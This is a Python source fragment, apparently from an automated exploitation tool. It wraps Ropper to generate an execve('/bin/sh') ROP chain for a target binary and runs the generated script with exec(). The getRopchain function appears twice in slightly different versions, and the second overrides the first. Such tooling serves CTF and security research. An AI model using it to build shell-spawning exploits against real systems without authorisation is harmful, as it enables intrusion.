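def _ropper_arch(pwntools_arch):
    """Map a pwntools-style architecture string onto the name Ropper expects.

    Ropper spells architectures differently from pwntools ('x86', 'x86_64',
    'ARM', ...); see
    https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md

    The '64' test runs first, so any string containing '64' (including
    'aarch64') maps to 'x86_64'; anything that is neither 64-bit nor ARM falls
    back to 'x86'. MIPS and PPC strings are therefore not handled here.
    """
    if '64' in pwntools_arch:
        return 'x86_64'
    if 'arm' in pwntools_arch.lower():
        return 'ARM'
    return 'x86'


def getRopchain(properties, bad_bytes):
    """Build an execve ROP chain for the target binary with Ropper.

    ``RopperService.createRopChain`` does not return the chain itself; it
    returns Python source that prints the chain and leaves it in a variable
    named ``rop``. That source is patched up, executed, and ``rop`` is read
    back out of the execution namespace.

    Args:
        properties: dict with ``'file'`` (path of the target binary),
            ``'protections'['arch']`` (pwntools-style arch string) and,
            optionally, ``'libc'`` (path of a linked libc, or ``None``).
        bad_bytes: iterable of characters the chain must not contain; joined
            into Ropper's ``'badbytes'`` option string.

    Returns:
        The ``rop`` object produced by the generated Ropper script.

    Side effects:
        Prints diagnostics and calls ``exit(0)`` when no chain can be built.
    """
    options = {
        'color': False,
        'badbytes': ''.join(bad_bytes),
        'all': False,
        'inst_count': 6,
        'type': 'all',
        'count_of_findings': 5,
        'cfg_only': False,
        'detailed': False,
    }
    rs = RopperService(options)

    # Resolve libc once so the teardown below removes exactly the files that
    # were added; a ``'libc'`` key holding None must not reach removeFile().
    libc = properties.get('libc')
    if libc is not None:
        rs.addFile(libc)
    rs.addFile(properties['file'])
    rs.loadGadgetsFor()

    arch = _ropper_arch(properties['protections']['arch'])
    chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})

    # Ropper emits Python-2 flavoured source: str literals where bytes are
    # needed and a bare ``print rop`` statement. Both are patched textually
    # before the source is executed, which is fragile if Ropper's output
    # format changes.
    chain = chain.replace(" '", " b'")
    chain = chain.replace("print rop", "")
    if "Cannot create chain" in chain or 'INSERT' in chain:
        print("[-] Failed to create rop chain. Try adding linked libraries")
        if libc is None:
            print("[~] Try adding linked libc")
        # NOTE: exit status 0 even though generation failed; callers and
        # wrapper scripts cannot detect the failure from the exit code.
        exit(0)

    # The executed text is code generated from the binaries loaded above, so
    # those files must be trusted input; exec() runs it with no sandboxing.
    namespace = {}
    exec(chain, namespace)  # the generated script defines ``rop``

    if libc is not None:
        rs.removeFile(libc)
    rs.removeFile(properties['file'])
    return namespace['rop']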
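def getRopchain(properties, bad_bytes):
    """Build an execve ROP chain for the target binary with Ropper.

    ``RopperService.createRopChain`` returns Python source that, when run,
    leaves the chain in a variable named ``rop``; that source is executed and
    ``rop`` is read back out of the execution namespace.

    Args:
        properties: dict with ``'file'`` (path of the target binary),
            ``'protections'['arch']`` (pwntools-style arch string) and,
            optionally, ``'libc'`` (path of a linked libc, or ``None``).
        bad_bytes: iterable of characters the chain must not contain; joined
            into Ropper's ``'badbytes'`` option string.

    Returns:
        The ``rop`` object produced by the generated Ropper script.

    Side effects:
        Prints diagnostics and calls ``exit(0)`` when no chain can be built.
    """
    options = {
        'color': False,
        'badbytes': ''.join(bad_bytes),
        'all': False,
        'inst_count': 6,
        'type': 'all',
        'count_of_findings': 5,
        'cfg_only': False,
        'detailed': False,
    }
    rs = RopperService(options)

    # Resolve libc once so that the teardown below removes exactly the files
    # that were added; a ``'libc'`` key holding None must not reach
    # removeFile(). (A stray debug print of the libc path was dropped here.)
    libc = properties.get('libc')
    if libc is not None:
        rs.addFile(libc)
    rs.addFile(properties['file'])
    rs.loadGadgetsFor()

    # Ropper names architectures differently from pwntools ('x86', 'x86_64',
    # 'ARM', ...); see
    # https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md
    # The '64' test runs first, so any string containing '64' maps to
    # 'x86_64'; MIPS and PPC strings fall through to the 'x86' default.
    pwn_arch = properties['protections']['arch']
    if '64' in pwn_arch:
        arch = 'x86_64'
    elif 'arm' in pwn_arch.lower():
        arch = 'ARM'
    else:
        arch = 'x86'

    chain = rs.createRopChain("execve", arch, {'cmd': '/bin/sh'})
    if "Cannot create chain" in chain or 'INSERT' in chain:
        print("[-] Failed to create rop chain. Try adding linked libraries")
        if libc is None:
            print("[~] Try adding linked libc")
        # NOTE: exit status 0 even though generation failed; callers and
        # wrapper scripts cannot detect the failure from the exit code.
        exit(0)

    # The executed text is code generated from the binaries loaded above, so
    # those files must be trusted input; exec() runs it with no sandboxing.
    # NOTE(review): Ropper's script contains a bare ``print rop``; this
    # version does not strip it, so it presumably targets Python 2 — confirm.
    namespace = {}
    exec(chain, namespace)  # the generated script defines ``rop``

    if libc is not None:
        rs.removeFile(libc)
    rs.removeFile(properties['file'])
    return namespace['rop']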